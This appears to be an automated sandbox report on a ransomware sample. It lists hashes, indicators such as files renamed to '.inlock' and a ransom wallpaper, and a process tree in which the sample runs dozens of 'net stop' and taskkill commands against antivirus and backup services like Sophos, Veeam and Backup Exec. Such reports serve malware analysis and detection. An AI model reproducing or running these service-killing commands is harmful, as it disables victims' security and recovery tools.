96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd

Resubmissions

07/11/2022, 05:24

221107-f31ktscgbk 8

07/11/2022, 05:17

221107-fy67tacegp 9

Analysis

max time kernel
148s
max time network
170s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
07/11/2022, 05:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
Size

196KB
MD5

005c8975c5aeeeb883b178da8179478c
SHA1

1e2eb9855e058a1bfa1f8ec7caa56d2f260a8b35
SHA256

96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd
SHA512

47f8a1d6ca334d245dae4e71b1ed95de64a9d9783d6e6d9604802136d03c53c74355b981dda769390b0127f752db2f5d789b1d1282e8cb5a2cc1de58658ee45b
SSDEEP

3072:3VfmkwEMe2q58ALuHaqgGntLXibKpQjRLVxuM+lmsolAIrRuw+mqv9j1MWLQccd:3Vfm+MeMAvqgGVSb4QjRLVxN+lDAAK

Score

8^/10

ransomware

Malware Config

Signatures

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\CloseInvoke.crw => C:\Users\Admin\Pictures\CloseInvoke.crw.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File renamed	C:\Users\Admin\Pictures\CompareSkip.png => C:\Users\Admin\Pictures\CompareSkip.png.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File renamed	C:\Users\Admin\Pictures\DisableWait.tif => C:\Users\Admin\Pictures\DisableWait.tif.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File renamed	C:\Users\Admin\Pictures\SkipMeasure.tiff => C:\Users\Admin\Pictures\SkipMeasure.tiff.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File renamed	C:\Users\Admin\Pictures\SwitchSplit.tiff => C:\Users\Admin\Pictures\SwitchSplit.tiff.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File renamed	C:\Users\Admin\Pictures\CloseRedo.raw => C:\Users\Admin\Pictures\CloseRedo.raw.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File renamed	C:\Users\Admin\Pictures\CompleteSync.png => C:\Users\Admin\Pictures\CompleteSync.png.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File opened for modification	C:\Users\Admin\Pictures\SkipMeasure.tiff	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File opened for modification	C:\Users\Admin\Pictures\SwitchSplit.tiff	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
File renamed	C:\Users\Admin\Pictures\WaitExpand.png => C:\Users\Admin\Pictures\WaitExpand.png.inlock	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\ransom.jpg"	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 44 IoCs

evasion

pid	Process
8244	taskkill.exe
6348	taskkill.exe
7024	taskkill.exe
9884	taskkill.exe
10236	taskkill.exe
9960	taskkill.exe
9908	taskkill.exe
9652	taskkill.exe
6628	taskkill.exe
4600	taskkill.exe
6160	taskkill.exe
6816	taskkill.exe
7472	taskkill.exe
10036	taskkill.exe
9724	taskkill.exe
10132	taskkill.exe
6096	taskkill.exe
8568	taskkill.exe
9972	taskkill.exe
10232	taskkill.exe
9916	taskkill.exe
10204	taskkill.exe
9900	taskkill.exe
7972	taskkill.exe
9056	taskkill.exe
10184	taskkill.exe
10124	taskkill.exe
8436	taskkill.exe
8836	taskkill.exe
7004	taskkill.exe
8152	taskkill.exe
8296	taskkill.exe
4580	taskkill.exe
9840	taskkill.exe
8748	taskkill.exe
8284	taskkill.exe
7504	taskkill.exe
10128	taskkill.exe
6040	taskkill.exe
6812	taskkill.exe
1240	taskkill.exe
2312	taskkill.exe
10188	taskkill.exe
5148	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5300	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
9104	mspaint.exe
9104	mspaint.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
Token: SeDebugPrivilege	7472	taskkill.exe
Token: SeDebugPrivilege	10204	taskkill.exe
Token: SeDebugPrivilege	6160	taskkill.exe
Token: SeDebugPrivilege	5148	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	7024	taskkill.exe
Token: SeDebugPrivilege	4600	taskkill.exe
Token: SeDebugPrivilege	6816	taskkill.exe
Token: SeDebugPrivilege	4580	taskkill.exe
Token: SeDebugPrivilege	8152	taskkill.exe
Token: SeDebugPrivilege	9884	taskkill.exe
Token: SeDebugPrivilege	6040	taskkill.exe
Token: SeDebugPrivilege	6812	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	6348	taskkill.exe
Token: SeDebugPrivilege	10232	taskkill.exe
Token: SeDebugPrivilege	10188	taskkill.exe
Token: SeDebugPrivilege	8836	taskkill.exe
Token: SeDebugPrivilege	8296	taskkill.exe
Token: SeDebugPrivilege	10236	taskkill.exe
Token: SeDebugPrivilege	9916	taskkill.exe
Token: SeDebugPrivilege	10132	taskkill.exe
Token: SeDebugPrivilege	8436	taskkill.exe
Token: SeDebugPrivilege	8748	taskkill.exe
Token: SeDebugPrivilege	9908	taskkill.exe
Token: SeDebugPrivilege	9840	taskkill.exe
Token: SeDebugPrivilege	9056	taskkill.exe
Token: SeDebugPrivilege	7972	taskkill.exe
Token: SeDebugPrivilege	8284	taskkill.exe
Token: SeDebugPrivilege	6096	taskkill.exe
Token: SeDebugPrivilege	8568	taskkill.exe
Token: SeDebugPrivilege	9652	taskkill.exe
Token: SeDebugPrivilege	10036	taskkill.exe
Token: SeDebugPrivilege	9900	taskkill.exe
Token: SeDebugPrivilege	7504	taskkill.exe
Token: SeDebugPrivilege	8244	taskkill.exe
Token: SeDebugPrivilege	7004	taskkill.exe
Token: SeDebugPrivilege	9960	taskkill.exe
Token: SeDebugPrivilege	6628	taskkill.exe
Token: SeDebugPrivilege	9724	taskkill.exe
Token: SeDebugPrivilege	10124	taskkill.exe
Token: SeDebugPrivilege	10128	taskkill.exe
Token: SeDebugPrivilege	9972	taskkill.exe
Token: SeDebugPrivilege	10184	taskkill.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
9104	mspaint.exe
9104	mspaint.exe
9104	mspaint.exe
9104	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4440 wrote to memory of 4248	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	93
PID 4440 wrote to memory of 4248	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	93
PID 4440 wrote to memory of 4248	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	93
PID 4440 wrote to memory of 4264	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	95
PID 4440 wrote to memory of 4264	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	95
PID 4440 wrote to memory of 4264	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	95
PID 4440 wrote to memory of 4364	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	96
PID 4440 wrote to memory of 4364	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	96
PID 4440 wrote to memory of 4364	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	96
PID 4440 wrote to memory of 3368	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	99
PID 4440 wrote to memory of 3368	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	99
PID 4440 wrote to memory of 3368	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	99
PID 4440 wrote to memory of 4644	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	101
PID 4440 wrote to memory of 4644	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	101
PID 4440 wrote to memory of 4644	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	101
PID 4440 wrote to memory of 1808	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	103
PID 4440 wrote to memory of 1808	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	103
PID 4440 wrote to memory of 1808	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	103
PID 4440 wrote to memory of 2964	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	105
PID 4440 wrote to memory of 2964	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	105
PID 4440 wrote to memory of 2964	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	105
PID 4440 wrote to memory of 2748	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	106
PID 4440 wrote to memory of 2748	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	106
PID 4440 wrote to memory of 2748	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	106
PID 4440 wrote to memory of 5020	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	107
PID 4440 wrote to memory of 5020	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	107
PID 4440 wrote to memory of 5020	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	107
PID 4440 wrote to memory of 3896	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	108
PID 4440 wrote to memory of 3896	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	108
PID 4440 wrote to memory of 3896	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	108
PID 4440 wrote to memory of 4948	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	109
PID 4440 wrote to memory of 4948	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	109
PID 4440 wrote to memory of 4948	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	109
PID 4440 wrote to memory of 3396	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	110
PID 4440 wrote to memory of 3396	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	110
PID 4440 wrote to memory of 3396	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	110
PID 4440 wrote to memory of 4592	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	111
PID 4440 wrote to memory of 4592	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	111
PID 4440 wrote to memory of 4592	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	111
PID 4440 wrote to memory of 1892	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	112
PID 4440 wrote to memory of 1892	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	112
PID 4440 wrote to memory of 1892	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	112
PID 4440 wrote to memory of 2764	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	113
PID 4440 wrote to memory of 2764	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	113
PID 4440 wrote to memory of 2764	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	113
PID 4440 wrote to memory of 3428	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	114
PID 4440 wrote to memory of 3428	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	114
PID 4440 wrote to memory of 3428	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	114
PID 4440 wrote to memory of 2756	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	115
PID 4440 wrote to memory of 2756	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	115
PID 4440 wrote to memory of 2756	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	115
PID 4440 wrote to memory of 3676	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	116
PID 4440 wrote to memory of 3676	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	116
PID 4440 wrote to memory of 3676	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	116
PID 4440 wrote to memory of 4156	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	117
PID 4440 wrote to memory of 4156	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	117
PID 4440 wrote to memory of 4156	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	117
PID 4440 wrote to memory of 3552	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	118
PID 4440 wrote to memory of 3552	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	118
PID 4440 wrote to memory of 3552	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	118
PID 4440 wrote to memory of 312	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	119
PID 4440 wrote to memory of 312	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	119
PID 4440 wrote to memory of 312	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	119
PID 4440 wrote to memory of 4116	4440	96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe	120

C:\Users\Admin\AppData\Local\Temp\96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe
"C:\Users\Admin\AppData\Local\Temp\96e48ea92e40ebe25e26aa769b38cbe27f26f2718d184a6ba2fd3bb900992ebd.exe"
1⤵
- Modifies extensions of user files
- Checks computer location settings
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Acronis VSS Provider /y
  2⤵
  PID:4248
- - C:\Windows\SysWOW64\net.exe
    net stop Acronis VSS Provider /y
    3⤵
    PID:4404
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Acronis VSS Provider /y
      4⤵
      PID:5800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Enterprise Client Service /y
  2⤵
  PID:4264
- - C:\Windows\SysWOW64\net.exe
    net stop Enterprise Client Service /y
    3⤵
    PID:2848
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Enterprise Client Service /y
      4⤵
      PID:5824
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos Agent /y
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos Agent /y
    3⤵
    PID:4224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos Agent /y
      4⤵
      PID:5840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos AutoUpdate Service /y
  2⤵
  PID:3368
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos AutoUpdate Service /y
    3⤵
    PID:2300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos AutoUpdate Service /y
      4⤵
      PID:5688
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos Clean Service /y
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos Clean Service /y
    3⤵
    PID:3516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos Clean Service /y
      4⤵
      PID:5704
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos Device Control Service /y
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos Device Control Service /y
    3⤵
    PID:2012
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos Device Control Service /y
      4⤵
      PID:5668
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos File Scanner Service /y
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos File Scanner Service /y
    3⤵
    PID:6400
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos File Scanner Service /y
      4⤵
      PID:6624
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:8620
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos Health Service /y
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos Health Service /y
    3⤵
    PID:6580
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos Health Service /y
      4⤵
      PID:7272
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos MCS Agent /y
  2⤵
  PID:5020
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos MCS Agent /y
    3⤵
    PID:6112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos MCS Agent /y
      4⤵
      PID:6760
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos MCS Client /y
  2⤵
  PID:3896
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos MCS Client /y
    3⤵
    PID:6500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos MCS Client /y
      4⤵
      PID:6096
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos Message Router /y
  2⤵
  PID:4948
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos Message Router /y
    3⤵
    PID:6460
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos Message Router /y
      4⤵
      PID:7176
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos Safestore Service /y
  2⤵
  PID:3396
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos Safestore Service /y
    3⤵
    PID:6484
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos Safestore Service /y
      4⤵
      PID:7192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos System Protection Service /y
  2⤵
  PID:4592
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos System Protection Service /y
    3⤵
    PID:6524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos System Protection Service /y
      4⤵
      PID:7328
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Sophos Web Control Service /y
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\net.exe
    net stop Sophos Web Control Service /y
    3⤵
    PID:6588
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sophos Web Control Service /y
      4⤵
      PID:7200
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLsafe Backup Service /y
  2⤵
  PID:2764
- - C:\Windows\SysWOW64\net.exe
    net stop SQLsafe Backup Service /y
    3⤵
    PID:6452
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLsafe Filter Service /y
  2⤵
  PID:3428
- - C:\Windows\SysWOW64\net.exe
    net stop SQLsafe Filter Service /y
    3⤵
    PID:6364
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLsafe Filter Service /y
      4⤵
      PID:7072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:7288
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Symantec System Recovery /y
  2⤵
  PID:2756
- - C:\Windows\SysWOW64\net.exe
    net stop Symantec System Recovery /y
    3⤵
    PID:6604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Symantec System Recovery /y
      4⤵
      PID:7216
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Veeam Backup Catalog Data Service /y
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\net.exe
    net stop Veeam Backup Catalog Data Service /y
    3⤵
    PID:5984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Veeam Backup Catalog Data Service /y
      4⤵
      PID:6848
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop AcronisAgent /y
  2⤵
  PID:4156
- - C:\Windows\SysWOW64\net.exe
    net stop AcronisAgent /y
    3⤵
    PID:6372
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:7080
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop AcrSch2Svc /y
  2⤵
  PID:3552
- - C:\Windows\SysWOW64\net.exe
    net stop AcrSch2Svc /y
    3⤵
    PID:6596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:7024
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Antivirus /y
  2⤵
  PID:312
- - C:\Windows\SysWOW64\net.exe
    net stop Antivirus /y
    3⤵
    PID:6468
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:7184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ARSM /y
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\net.exe
    net stop ARSM /y
    3⤵
    PID:5396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:5816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop BackupExecAgentAccelerator /y
  2⤵
  PID:2052
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecAgentAccelerator /y
    3⤵
    PID:5540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:6856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop BackupExecAgentBrowser /y
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecAgentBrowser /y
    3⤵
    PID:6164
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:6824
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop BackupExecDeviceMediaService /y
  2⤵
  PID:3904
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecDeviceMediaService /y
    3⤵
    PID:6148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:6832
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop BackupExecJobEngine /y
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecJobEngine /y
    3⤵
    PID:6508
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:7020
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop BackupExecManagementService /y
  2⤵
  PID:4356
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecManagementService /y
    3⤵
    PID:6180
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:6808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop BackupExecRPCService /y
  2⤵
  PID:3836
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecRPCService /y
    3⤵
    PID:6236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:6840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop BackupExecVSSProvider /y
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecVSSProvider /y
    3⤵
    PID:6516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:7068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop bedbg /y
  2⤵
  PID:3644
- - C:\Windows\SysWOW64\net.exe
    net stop bedbg /y
    3⤵
    PID:6284
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:6864
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop DCAgent /y
  2⤵
  PID:2244
- - C:\Windows\SysWOW64\net.exe
    net stop DCAgent /y
    3⤵
    PID:6536
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:7336
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop EPUpdateService /y
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\net.exe
    net stop EPUpdateService /y
    3⤵
    PID:6492
